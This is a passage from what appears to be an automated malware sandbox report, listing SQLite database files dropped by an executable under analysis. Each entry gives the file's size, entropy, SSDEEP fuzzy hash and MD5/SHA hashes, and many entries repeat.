                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
